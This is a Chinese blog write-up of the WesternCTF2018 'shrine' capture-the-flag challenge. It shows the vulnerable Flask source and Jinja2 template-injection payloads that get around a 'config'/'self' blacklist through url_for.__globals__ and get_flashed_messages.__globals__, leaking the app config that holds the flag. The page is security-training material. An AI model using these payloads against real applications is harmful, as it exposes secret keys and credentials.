buuctf-[WesternCTF2018]shrine(小宇特详解)

最新推荐文章于 2024-05-28 23:50:07 发布
最新推荐文章于 2024-05-28 23:50:07 发布
阅读量1.4k 收藏 7
点赞数 1
分类专栏: buuctf 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/123154407
版权

buuctf-[WesternCTF2018]shrine(小宇特详解)

1.先看题目

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')
//注册了一个名为FLAG的config

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) //这里把config,self做了黑名单过滤,替换为空
        + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

这里推测flag在名为FLAG的config中,但是这里有黑名单过滤了config

这里可以进行ssti注入

这里进行判断

payload:

/shrine/{{6*6}}

这里可以进行ssti模板注入

这里可以利用两个python自带的函数来进行注入

url_for这个可以用来构造url,接受函数名作为第一个参数

get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。

构造payload

/shrine/{{url_for.__globals__}}

这里的current_app意思是当前app,我们访问当前app的config

/shrine/{{url_for.__globals__['current_app'].config}}

然后get_flashed_message()也是同理

payload:

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

小宇特详解
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[WesternCTF2018] web题-shrine
BROTHERYY的博客
12-30 251
开题即送源码一份 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') # 有一个名为flag的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') # 路径 def shrine(shrine): def safe_j
[WesternCTF2018]shrine
brainw的博客
04-28 464
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/...
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
神社::存储:: WebDAV 为提供一个简单的WebDAV存储。 安装 将此行添加到您的应用程序的Gemfile中: gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not null, primary key # name :string not null # created_at :datetime not null # updated_at :datetime
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 245
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
BUU-WEB-[WesternCTF2018]shrine
qq_24033605的博客
05-16 182
[WesternCTF2018]shrine flask框架审计。 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(
BUUCTF [WesternCTF2018] shrine
Senimo
12-16 450
BUUCTF [WesternCTF2018] shrine 考点: Flask模版注入 url_for()和get_flashed_messages()函数绕过黑名单 __globals__、__dict__等变量含义 启动环境: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return op
NO.2-20 [WesternCTF2018]shrine
nigo134的博客
08-01 306
SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 1.模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。一些模板引擎:Smarty,Mako,Jinja2,Jade,Velocity,Freemaker和Twig 模板引擎可
[Western CTF 2018]shrine
weixin_45751765的博客
02-16 1407
0x00 前言 ssti复习 贴一下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def s
Ruby-Shrine用来处理文件上传的Ruby工具包
08-15
Shrine - 用来处理文件上传的Ruby工具包
shrine-rails-example:使用Shrine gem的示例应用程序
03-10
神社Rails演示 这是的Rails演示。 它允许用户创建相册和附加图像。 该演示显示了高级工作流程: 上载: 用户选择一个或多个文件 将文件异步异步直接上传到S3,并显示进度条 缓存的文件数据被写入隐藏字段 ...
shrine-commerce
04-04
MDC-100系列代码实验室入门要获得Flutter入门方面的帮助,请查看我们的在线。
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2436
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
攻防世界XCTF:shrine
末初的CSDN博客
03-14 6641
这题涉及到我的知识盲区,主要是以下几点: SSTI Flask 框架 Bypass Sandbox 整理得到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return op...
第五十三题——[WesternCTF2018]shrine
分享简单的安全技术
04-29 248
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>')
渗透学习-CTF篇-web-BUUCTF
qq_43696276的博客
01-17 2037
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
基于python flask的疾病数据采集与可视化大屏,实现关联规则算法的治疗方法分析
最新发布
weixin_49081159的博客
05-28 378
基于Python Flask的疾病数据采集与可视化大屏,旨在实现对疾病数据的采集、分析和可视化展示,为医疗领域提供决策支持和治疗方法分析。其中,关联规则算法被应用于治疗方法分析,旨在发现不同治疗方式之间的关联性和规律性,从而为医疗决策提供依据。通过大屏可视化展示,医疗从业者可以直观了解不同治疗方法之间的相关性,探索潜在的治疗方案组合,优化治疗流程,提高医疗效率和疗效。这项研究背景旨在结合数据采集、关联规则算法和可视化技术,为医疗决策提供更科学、数据驱动的支持,推动医疗信息化与智能化发展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值